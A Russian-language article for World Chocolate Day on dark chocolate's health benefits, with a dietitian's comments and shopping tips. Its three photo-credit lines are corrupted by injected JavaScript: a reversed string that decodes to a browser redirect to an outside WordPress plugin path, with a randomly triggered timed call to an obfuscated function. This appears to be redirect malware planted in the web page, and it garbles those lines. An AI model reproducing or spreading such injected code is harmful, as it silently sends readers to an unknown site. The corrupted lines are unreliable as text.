11 июля — Всемирный день шоколада. Это простой и очень вкусный десерт, который удобно брать в дорогу, он быстро насыщает, а ещё имеет множество полезных свойств. Вместе с врачом-эндокринологом и диетологом, генетиком медицинского центра «Атлас» Ларисой Бавыкиной разбираемся, какой шоколад самый полезный и как выбрать правильную плитку.
- 1. Шоколад богат антиоксидантами и клетчаткой
- Лариса Бавыкина
- 2. Шоколад снижает риск развития болезней сердца
- Лариса Бавыкина
- 3. Шоколад улучшает настроение
- 4. Шоколад способствует работе мозга
- Лариса Бавыкина
- 5. Шоколад хорошо насыщает
- Лариса Бавыкина
- Какой шоколад самый полезный
- Лариса Бавыкина
- Как выбрать полезный шоколад
1. Шоколад богат антиоксидантами и клетчаткой
Основа шоколада — какао-масло и тёртое какао. Вещества полифенолы, флаванолы и катехины, содержащиеся в какао, обладают антиоксидантной активностью. В ходе исследований учёные доказали, что какао и тёмный шоколад содержат больше антиоксидантов, чем черника или ягоды асаи. Кроме того, качественный тёмный шоколад богат клетчаткой: на 100 граммов шоколада приходится около 11 граммов растительных волокон.
Лариса Бавыкина
врач-эндокринолог и диетолог, генетик медицинского центра «Атлас»
— Полезными свойствами обладает только тёмный шоколад (70%, 85%, 99% какао). В молочных плитках мало какао-продуктов и много сахара. Тёмный шоколад содержит до 67% суточной нормы железа, до 58% магния, до 89% меди, до 98% марганца, а также калий, фосфор, цинк и селен.
Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com
2. Шоколад снижает риск развития болезней сердца
Какао и тёмный шоколад повышают уровень «хорошего» холестерина (ЛПВП) и защищают от окисленного «плохого» холестерина (ЛПНП). Это связано с профилактическим эффектом снижения риска развития сердечно-сосудистых заболеваний. Эксперимент с участием 470 пожилых мужчин показал, что какао снижает риск смерти от болезней сердца на 50% за 15-летний период. В ходе других исследований было установлено, что употребление шоколада два или более раз в неделю снижает риск кальцификации артерий на 32%, то есть способствует сохранению эластичности сосудов. Более редкое употребление шоколада не дало подобного эффекта.
Тёмный шоколад улучшает показатели кровяного давления. Долька горького шоколада тонизирует сосуды и помогает почувствовать себя лучше. Учёные исследовали 44 000 человек с гипертонией. Одни 1,5 года употребляли по 6 граммов горького шоколада в день, другие — столько же белого шоколада. У первой группы значительно снизилось артериальное давление, у второй никаких изменений не выявили.
Лариса Бавыкина
врач-эндокринолог и диетолог, генетик медицинского центра «Атлас»
— Этот эффект связан с большим содержанием флавонолов, которые стимулируют эндотелий (клетки, выстилающие сосуды изнутри) к образованию оксида азота. Оксид азота снижает сопротивление артерий кровотоку и, как следствие, нормализует артериальное давление. Но эффект выражен незначительно, к кусочку шоколада не стоит относиться как к лекарству от гипертонии.
Некоторые исследования подтверждают связь употребления шоколада со снижением риска сердечного приступа и инсульта.
3. Шоколад улучшает настроение
По некоторым данным, он даже может облегчать симптомы депрессии. В тёмном шоколаде есть вещество фенилэтиламин. Оно сигнализирует организму о необходимости выработки эндорфина (гормона радости). Отсюда и эффект повышения настроения. А ещё полифенолы в какао повышают чувство спокойствия и удовлетворённости.
Финские учёные выяснили: если беременная женщина употребляет шоколад, это может положительно влиять на настроение ребёнка первые шесть месяцев его жизни.
Как шоколад повышает выносливость и делает вашу тренировку эффективнее
Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com
4. Шоколад способствует работе мозга
Флавонолы, которыми богато какао, улучшают когнитивные функции. Когда необходимо сосредоточиться или запомнить большое количество информации, есть смысл съесть немного горького шоколада.
Лариса Бавыкина
врач-эндокринолог и диетолог, генетик медицинского центра «Атлас»
— Флавонолы улучшают память и концентрацию. Какао может значительно улучшить когнитивные функции у пожилых людей с нарушениями психики, в том числе и беглость речи. Этот эффект связан в большей степени с кофеином и, возможно, стимулятором теобромином, который содержится в шоколаде.
Кроме того, шоколад богат жирными кислотами, которые полезны для мозга и всего организма в целом, кофеином (он снижает риск нейродегенеративных болезней, например болезни Паркинсона).
5. Шоколад хорошо насыщает
Главный ингредиенты шоколада — какао-масло и тёртое какао — довольно жирные и калорийные. Они делают шоколад сытным. При этом многие отмечают, что довольно сложно съесть много горького шоколада. Для насыщения хватает пары кусочков. С молочным шоколадом дела обстоят иначе — можно незаметно для себя сразу съесть целую плитку.
Согласно рекомендациям Всемирной организации здравоохранения, здоровое количество свободных сахаров (добавленного в продукты сахара и сахара, который содержится в мёде, сиропах, соках) не должно превышать 5–10% от дневной калорийности. Это означает, что допустимо употреблять 100–200 ккал из десертов и других сладких продуктов в день.
Лариса Бавыкина
врач-эндокринолог и диетолог, генетик медицинского центра «Атлас»
— Горький шоколад улучшает чувствительность к инсулину. Это важно при преддиабете и развитии сахарного диабета 2 типа. Но это работает, только если соблюдаются другие меры — в том числе снижение веса.
В 100 граммах тёмного шоколада содержится до 600 ккал и умеренное количество сахара. Немецкие учёные выяснили, что если съедать по 25 граммов (четверть плитки) шоколада в день, через три месяца можно набрать вес. При этом 6 граммов шоколада в день никак не отразятся на весе. Так что 1-2 кусочка — оптимальная ежедневная доза.
Если в течение долгого времени есть много шоколада, это может привести к ожирению, нарушению углеводного обмена, ухудшению состояния зубов, аллергии и изжоге.
Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com
Какой шоколад самый полезный
Шоколад — один из немногих десертов, в котором нет муки, дрожжей. Продукт хорошего качества можно найти во многих супермаркетах. Самый полезный шоколад — с содержанием какао 70% и выше. Такой шоколад хорош как самостоятельный перекус или как добавка в утреннюю кашу или йогурт.
Лариса Бавыкина
врач-эндокринолог и диетолог, генетик медицинского центра «Атлас»
— Правильный шоколад делают из какао-масла и тёртого какао. Чем меньше ингредиентов, тем качественнее продукт. Избегайте шоколада с растительными жирами, гидрожирами, пшеничными, соевыми и другими растительными компонентами, химическими добавками. Молочный шоколад с сухим молоком в составе — это обычный десерт.
8 брендов полезных сладостей
Как выбрать полезный шоколад
Выбирая шоколад, обращайте внимание на следующее:
- цена. Натуральное какао-масло и тёртое какао стоят дорого. Качественная 100-граммовая плитка должна стоить от 200 рублей. В зависимости от бренда и ингредиентов цена может быть выше. Например, если вместо сахара добавлен мёд или сироп топинамбура;
- состав. Качественный шоколад сделан из трёх-четырёх ингредиентов. Помимо какао-масла, тёртого какао и сахара производители часто добавляют лецитин. Он нужен, чтобы шоколад сформировался в красивую гладкую плитку;
- условия хранения. Не приобретайте шоколад, который хранится в жаре, температура хранения должна быть 15–17 градусов. Эти условия редко соблюдаются в магазинах летом;
- срок годности. Хороший шоколад хранится не более 4–6 месяцев.
Статьи по теме
Пирожные из горького шоколада и тахини
Лимонный пирог без выпечки
Как есть меньше сахара, не отказываясь от сладкого
4 рецепта освежающих летних напитков без сахара